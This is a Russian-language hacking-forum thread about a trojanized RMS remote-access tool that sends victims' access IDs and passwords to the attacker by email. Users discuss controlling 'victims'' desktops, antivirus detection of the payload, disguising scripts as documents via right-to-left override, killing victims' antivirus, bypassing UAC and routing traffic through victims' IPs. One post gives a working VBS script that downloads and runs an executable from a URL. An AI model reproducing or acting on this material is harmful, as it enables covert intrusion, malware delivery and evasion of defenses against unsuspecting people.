RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. Blokada
    Blokada Новичок
    Симпатии:
    0
    Нужно управлять рабочим столом.

Когда кликаешь на управление или просмотр рабочего стола сначала грузится черный экран потом rms выдает ошибку "Управление рабочим столом произошла ошибка, cоединение было прервано" у жертвы не просто два монитора а как я понял из быстрого просмотра (скрин выше) два рабочих стола. Походу rms ловит глюк не зная каким управлять. Я просто ни бум-бум в восьмерке и какие функции в ней реализованы. Короче как вариант решения проблеммы, как удаленно отключить один из рабочих столов?

21 апр 2014
  2. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Не, на скрине всего один рабочий стол. Но на два моника расширенна рабочая область. Я стабильно подключался на старых версиях к WIN7 на два монитора. Думаю, здесь может быть какая-то проблема с драйверами, но по идее, они просто не могли не продумать подобный случай =) Я тогда просто вел мышку вбок до упора и картинка переползала на соседний монитор.

Быть может в момент подключения Windows включен экран блокировки?
    Тогда его можно отключить в реестре
    Код:
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\

создаем раздел Personalization. В разделе Personalization создаем параметр типа DWORD с именем NoLockScreen и присваеваем значение 1
    Добавлено через 2 часа 1 минуту
    Попробуй еще с этими опциями поиграть.

Ну и самый крайний случай, попробуй отправить на удаленный компьютер комбинацию клавиш "WIN+P" несколько раз и ENTER. Или уж совсем крайний - поискать параметр настройки нескольких дисплеев в реестре. Но я уже спать иду и врядли сейчас найду что нибудь %) Можешь попробовать "Procmon" использовать чтобы отследить изменения реестра при выборе различных параметров настройки мониторов и по аналогии исправить на удаленном компьютере.

Последнее редактирование: 21 апр 2014
    21 апр 2014
  3. ww2
    ww2 Продвинутый
    Симпатии:
    12
    Internet ID Server:
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    A-L-I-E-N
    Да можно использовать такой вариант с VPN + no-ip, главно чтоб IP за nat небыл)

21 апр 2014
  4. ww2
    ww2 Продвинутый
    Симпатии:
    12

21 апр 2014
  5. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Само тело пока чисто. На вирустотале приватном чекере палит только комодо. Может проактивка или ещё что.

21 апр 2014
  6. Blokada
    Blokada Новичок
    Симпатии:
    0
    Палит Oupost Security Suite Pro 9.1 Trojan.Graftor!vwJws68L3Rc

Написал загрузчик для rms через VBS скрипт. Пример с WinRar

Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    oXMLHTTP.Open "GET", "http://rarlab.com/rar/wrar500ru.exe", 0 (http ссылка на инсталятор)
    oXMLHTTP.Send
    Set oADOStream = CreateObject("ADODB.Stream")
    oADOStream.Mode = 3
    oADOStream.Type = 1
    oADOStream.Open
    oADOStream.Write oXMLHTTP.responseBody
    oADOStream.SaveToFile "C:\wrar500ru.exe", 2 (путь куда сохранить инсталятор)
    dim path, WshShell
    path = "C:\"
    set WshShell = WScript.CreateObject("Wscript.Shell")
    WshShell.Run path & "wrar500ru.exe", ,true (запуск инсталятора)

Меня интересует
    1) Как замаскировать vbs скрипт сменить иконку и расширения под файлы типа doc, xls или pdf так что бы скрипт остался работоспособный и запускался из zip\rar архива? A-L-I-E-N писал выше про left-to-right override но я нновенький на форуме ссылки под хайдом не доступны.
    2) Кто нибудь обьясните вменяемо, что значит ограничение на один лицензионный ключ 10 компьютеров? Если мой инсталятор с бесплатным ключем установят 20 компьютеров мне будут доступны только 10 последних установших?

Последнее редактирование: 22 апр 2014
    21 апр 2014
  7. nightop
    nightop Новичок
    Симпатии:
    6
    толку от left to right override практически я не нашел. в своей системе (ито только win7,возможно win8?) этот трюк радует глаз. но в любом архиве exe остается, если по скайпу кидать тоже не срабатывает трюк(
    в win xp не работает.
    так где ещё эту фичу можно применить?)

у кого есть личный internet-id сервер? :)

И вообще смысла не вижу маскировать exe, ибо в win7\8 заорет UAC. И если пользователь не слепой, то все поймет и запускать не будет.
    Походу легче войти в доверие\представть программу хорошей и тд)

Последнее редактирование: 22 апр 2014
    22 апр 2014
  8. nightop
    nightop Новичок
    Симпатии:
    6
    глянь тут http://profhelp.com.ua/articles/%D0%BA%D0%B0%D0%BA-%D0%B7%D0%BB%D0%BE%D1%83%D0%BC%D1%8B%D1%88%D0%BB%D0%B5%D0%BD%D0%BD%D0%B8%D0%BA%D0%B8-%D0%BF%D0%BE%D0%B4%D0%B4%D0%B5%D0%BB%D1%8B%D0%B2%D0%B0%D1%8E%D1%82-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%80%D0%B5%D0%BD%D0%B8%D1%8F-%D1%84%D0%B0%D0%B9%D0%BB%D0%BE%D0%B2

24 апр 2014
  9. Blokada
    Blokada Новичок
    Симпатии:
    0
    Cпс но я уже разобрался, что это. left-to-right override оно же (RLO) фича на данный момент беспонтовая и не актуальная новички не тратьте зря время.

p.s. Как удаленно убивать антивирусники у жертв не входя в gui антивируса, taskkill /f /im не предлогать 0)))

24 апр 2014
  10. nightop
    nightop Новичок
    Симпатии:
    6
    Кто нить знает как обойти UAC ? :)
    Возможно в Exe засунуть манифест какой-нить, на который UAC бы не реагировал и давал установить?)

25 апр 2014
  11. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Не поможет манифест "какой-нить".
    В инторнетах валяются какие-то сырцы обхода, на сколько актуальные не в курсе.

25 апр 2014
  12. hoske
    hoske Новичок
    Симпатии:
    0
    из всего мной прочитанного так и не нашел не чего актуального, куча способов по перепробовал, но не получается создать нормальный рмс, Прошу помощи у знатоков! Нужно сказать что сейчас актуально и по тв показать как все сделать! Помощь оплачиваемая (в долгу по любому не останусь.)

28 апр 2014
  13. scalpel
    scalpel Новичок
    Симпатии:
    4
    У каждого свои предпочтения,но TV был актуален,как раньше,так и сейчас,никаких гонок за новыми версиями,все спокойно себе работает и не палиться,как статиком,так и проактивками .

28 апр 2014
  14. hoske
    hoske Новичок
    Симпатии:
    0
    ТВ- имел ввиду тимвивер .
    Вобщем оч нуждаюсь в помощи!

28 апр 2014
  15. scalpel
    scalpel Новичок
    Симпатии:
    4
    Все вопросы в личку.

28 апр 2014
  16. hoske
    hoske Новичок
    Симпатии:
    0
    написал

28 апр 2014
  17. kilavat
    kilavat Новичок
    Симпатии:
    0
    ТС свою сборку не продает? Как например vinject, что тема выше тоже про рмс.

2 май 2014
  18. nightop
    nightop Новичок
    Симпатии:
    6
    Есть идеи как воспользоваться айпишником жертвы? Большинство за НАТом сидят, прокси не сгодится..
    Цель- серфить с айпи жертвы:af:

2 май 2014
  19. scalpel
    scalpel Новичок
    Симпатии:
    4
    Идея не нова,установить у холдера сокс с бк,подключиться по hvnc,или в скрытой сессии рдп.

2 май 2014
  20. nightop
    nightop Новичок
    Симпатии:
    6
    как это реализовать? на удаленой win7 нужно править реестр(для активизации терминального сервера, а также заводить доп учетку)?

3 май 2014
Статус темы:
Закрыта.
Загрузка...